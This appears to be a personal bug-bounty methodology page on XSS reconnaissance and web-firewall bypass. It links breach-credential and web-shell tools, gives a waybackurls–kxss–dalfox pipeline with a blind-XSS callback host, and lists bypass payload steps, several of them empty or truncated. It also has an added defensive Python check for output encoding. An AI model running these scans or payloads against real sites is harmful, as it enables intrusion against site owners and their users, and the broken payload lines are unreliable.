---
description: For Personal Reference
---
# 🧑🏫 My Methodologies
#### Gathering Breached Credentials
* [https://github.com/hmaverickadams/breach-parse](https://github.com/hmaverickadams/breach-parse)
#### File Upload Vulnerability Test
* [https://github.com/epinna/weevely3](https://github.com/epinna/weevely3)
**Set domain scope (burpsuite)**
```
.*\.target\.com$
```
#### XSS recon methodology
```
# collect archived URLs for every in-scope domain
cat domains.txt | waybackurls > urls.txt

cat urls.txt |                    # read the collected URLs
  kxss |                          # keep parameters that reflect special characters unfiltered
  sed 's/=.*/=/' |                # remove everything after "=", keeping the "="
  sed 's/URL: //' |               # strip the "URL: " prefix that kxss prints
  dalfox pipe -b xalgord.xss.ht   # dalfox XSS scan; -b sets the blind-XSS callback host
```
#### KXSS
For a parameter to be exploitable for XSS, its value must be reflected with these characters unfiltered: **\[" ' < > $ | ( ) \` : ; { } ]**
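An added example, not code from the page or from kxss itself: a Python check for the condition above, meant as a regression test for a handler's output encoding. It submits a probe made of a constructed marker followed by the listed characters and reports which of them come back raw rather than entity-encoded; `render_unsafe` and `render_safe` are constructed stand-ins for the handler under test.

```python
import html
import re

# Characters the page lists as needing to be reflected unfiltered for a
# parameter to be XSS-prone; an encoder must neutralise the ones that are
# meaningful in the output context.
SPECIAL_CHARS = '"\'<>$|()`:;{}'
# Constructed marker so the reflection can be located inside the response.
MARKER = "probe7f3a"
ENTITY = re.compile(r"&(?:#x?[0-9a-fA-F]+|[a-zA-Z]+);")

def build_probe() -> str:
    """Parameter value to submit: the marker followed by every special character."""
    return MARKER + SPECIAL_CHARS

def unencoded_reflections(response_body: str) -> set:
    """Return the special characters reflected raw (not entity-encoded) after the marker.

    Walks the text after each marker occurrence: a raw special character is a
    finding, an entity that decodes to it counts as encoded, and anything else
    means the filter dropped the character, so the walk does not advance.
    """
    found = set()
    for m in re.finditer(re.escape(MARKER), response_body):
        pos = m.end()
        for expected in SPECIAL_CHARS:
            if response_body.startswith(expected, pos):
                found.add(expected)
                pos += 1
                continue
            ent = ENTITY.match(response_body, pos)
            if ent and html.unescape(ent.group(0)) == expected:
                pos = ent.end()
    return found

def render_unsafe(value: str) -> str:
    """Constructed vulnerable handler: interpolates the value without encoding."""
    return f"<p>You searched for: {value}</p>"

def render_safe(value: str) -> str:
    """Same handler with HTML entity-encoding (html.escape with quote=True)."""
    return f"<p>You searched for: {html.escape(value, quote=True)}</p>"

if __name__ == "__main__":
    probe = build_probe()
    print("unsafe:", sorted(unencoded_reflections(render_unsafe(probe))))
    print("safe:  ", sorted(unencoded_reflections(render_safe(probe))))
```

`html.escape` only neutralises `" ' < >`, so the remaining characters still come back raw; whether that matters depends on whether the reflection lands in HTML text, an attribute or a script context.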
1. Basic payload:
```
">
```
2. Try to break the firewall's regex with a newline (`\r\n`), i.e. CRLF injection:
```
```
3. Try double encoding:
```
%2522
```
4. Test for recursive filters: if the firewall strips the nested tag (shown in bold in the original) only once, the remainder forms a clean payload:
```
ipt>alert(1);ipt>
```
5. Injecting anchor tag without whitespaces:
```
```
6. Try to bypass whitespaces using a bullet:
```